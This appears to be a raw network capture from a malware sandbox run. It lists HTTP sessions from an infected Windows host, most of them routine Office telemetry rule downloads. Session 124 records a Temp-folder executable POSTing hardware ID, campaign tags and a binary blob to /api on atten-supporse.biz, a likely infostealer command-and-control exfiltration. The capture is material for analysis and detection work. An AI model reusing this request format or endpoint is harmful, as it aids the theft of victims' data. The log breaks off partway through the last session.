<F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49902	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:53 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:53 UTC	515	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:53 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: d5396cac-001e-0049-0b7e-495bd5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185353Z-r1cf579d7782v2q5hC1EWRt9bw00000000yg000000001u9v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:53 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	49906	104.21.16.9	443	8128	C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:54 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CL38ZIP5V4GC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20407 Host: atten-supporse.biz
2024-12-08 18:53:54 UTC	15331	OUT	Data Raw: 2d 2d 43 4c 33 38 5a 49 50 35 56 34 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 33 42 39 45 39 32 32 41 37 31 36 46 31 30 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 43 4c 33 38 5a 49 50 35 56 34 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 4c 33 38 5a 49 50 35 56 34 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 43 4c 33 38 5a 49 50 35 Data Ascii: --CL38ZIP5V4GCContent-Disposition: form-data; name="hwid"683B9E922A716F1023D904AF30EFEBBC--CL38ZIP5V4GCContent-Disposition: form-data; name="pid"3--CL38ZIP5V4GCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--CL38ZIP5
2024-12-08 18:53:54 UTC	5076	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-08 18:53:55 UTC	1020	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dcrc653ehmt1lm602kbfiug5nv; expires=Thu, 03-Apr-2025 12:40:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NflFNLZZK1JiGjytBljN2fdMbHETH6GWNAIKaBgTgSbH6khZUlAa9xZjoKgTe6%2Bk4imIhPEaoh00baRZM0Im1IVMyQariG70SRATO8mld%2Ffp1qS7iUknqOY9GbRztHbq0n%2B8tC4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eeef5ffef88c342-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1640&rtt_var=637&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21365&delivery_rate=1688837&cwnd=160&unsent_bytes=0&cid=6cefd3d4093ddaac&ts=1189&x=0"
2024-12-08 18:53:55 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-08 18:53:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49908	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:55 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:55 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 5f90aa43-701e-0097-6403-48b8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185355Z-r1cf579d778xq4f9hC1EWRx41g00000005zg000000004wra x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:55 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49909	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:55 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:55 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: a762f06e-601e-0084-7004-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185355Z-r1cf579d778zvkpnhC1EWRv23g00000006g0000000001wuf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:55 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49911	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:55 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:55 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 2d97fd60-e01e-000c-7b06-488e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185355Z-r1cf579d778d5zkmhC1EWRk6h800000006hg0000000083gq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:55 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49912	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:55 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:55 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 22947e51-b01e-0021-7203-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185355Z-r1cf579d77867vg8hC1EWR8knc000000062g000000001v8w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:55 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49910	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:55 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:55 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: c22706de-601e-00ab-7503-4866f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185355Z-r1cf579d778dc6d7hC1EWR2vs800000006vg000000003vvr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:55 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.4	49915	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:57 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:57 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: a681d1f9-301e-0020-1b07-486299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185357Z-r1cf579d778lntp7hC1EWR9gg400000005m0000000005smd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:58 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.4	49918	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:57 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:58 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 1c872757-c01e-0034-1307-482af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185358Z-r1cf579d778d5zkmhC1EWRk6h800000006n0000000004t3z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:58 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
132	192.168.2.4	49917	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:57 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:58 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 48a8015d-701e-005c-614a-49bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185358Z-r1cf579d778z4wflhC1EWRa3h0000000068g00000000247b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:58 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
133	192.168.2.4	49916	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:57 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:58 UTC	494	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:58 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: af038a62-701e-005c-6f03-48bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185358Z-r1cf579d7786c2tshC1EWRr1gc00000005pg00000000b8ew x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:58 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 